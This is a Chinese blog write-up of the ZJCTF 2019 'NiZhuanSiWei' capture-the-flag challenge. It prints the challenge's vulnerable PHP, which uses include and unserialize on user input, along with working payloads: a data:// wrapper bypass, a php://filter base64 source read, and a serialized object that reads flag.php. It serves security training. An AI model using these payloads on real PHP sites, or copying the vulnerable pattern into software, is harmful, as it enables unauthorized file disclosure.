[ZJCTF 2019]NiZhuanSiWei

这题主要考察的是php伪协议与文件包含

第一层

打开之后得到一段代码

 <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}

第一层为if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))

文件包含，并且text文件里面要传入welcome to the zjctf

可以将文件内容通过data伪协议写进去，然后让file_get_contents()函数进行读取，payload如下

/?text=data://text/plain,welcome to the zjctf

得到回显

成功绕过第一层

第二层

重点代码如下

 if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}

正则过滤掉flag，而题目又提示了useless.php，所以用php://filter协议来读取useless.php，payload如下：

/?text=data://text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php

得到useless.php的内容，不过是用base64加密后的

第三层

base64解密之后，得到

 <?php  
 
class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

结合之前题目的代码，序列化一下

 <?php 
 
class Flag{  //flag.php 
    public $file="flag.php"; 
    public function __tostring(){ 
        if(isset($this->file)){ 
            echo file_get_contents($this->file);
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        } 
    } 
} 
$password=new Flag();
echo serialize($password);
?>

运行一下，得到

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

于是最后一层payload就出来了

?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

查看源码就得到了flag

另外,想补充一下有关伪协议与文件包含的知识

感觉这篇文章就不错伪协议与文件包含

posted @ 2021-10-27 16:56 Athena-ydy 阅读(46) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

阅读排行：
· 单线程的Redis速度为什么快？
· 展开说说关于C#中ORM框架的用法！
· Pantheons：用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么退出登录或修改密码无法使 token 失效

公告

昵称： Athena-ydy
园龄： 3年6个月
粉丝： 1
关注： 1

+加关注

2025年3月

日

一

二

三

四

五

六

随笔分类

随笔档案

阅读排行榜

评论排行榜

1. CRYPTO(6)

Athena-ydy

让一切都在努力的前提下顺其自然

[ZJCTF 2019]NiZhuanSiWei

第一层

第二层

第三层

公告

搜索

常用链接

我的标签

积分与排名

随笔分类

随笔档案

阅读排行榜

评论排行榜

推荐排行榜

最新评论

	<?php
	$text = $_GET["text"];
	$file = $_GET["file"];
	$password = $_GET["password"];
	if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
	echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
	if(preg_match("/flag/",$file)){
	echo "Not now!";
	exit();
	}else{
	include($file); //useless.php
	$password = unserialize($password);
	echo $password;
	}
	}
	else{
	highlight_file(__FILE__);
	}

	<?php

	class Flag{ //flag.php
	public $file;
	public function __tostring(){
	if(isset($this->file)){
	echo file_get_contents($this->file);
	echo "<br>";
	return ("U R SO CLOSE !///COME ON PLZ");
	}
	}
	}
	?>

	<?php

	class Flag{ //flag.php
	public $file="flag.php";
	public function __tostring(){
	if(isset($this->file)){
	echo file_get_contents($this->file);
	echo "<br>";
	return ("U R SO CLOSE !///COME ON PLZ");
	}
	}
	}
	$password=new Flag();
	echo serialize($password);
	?>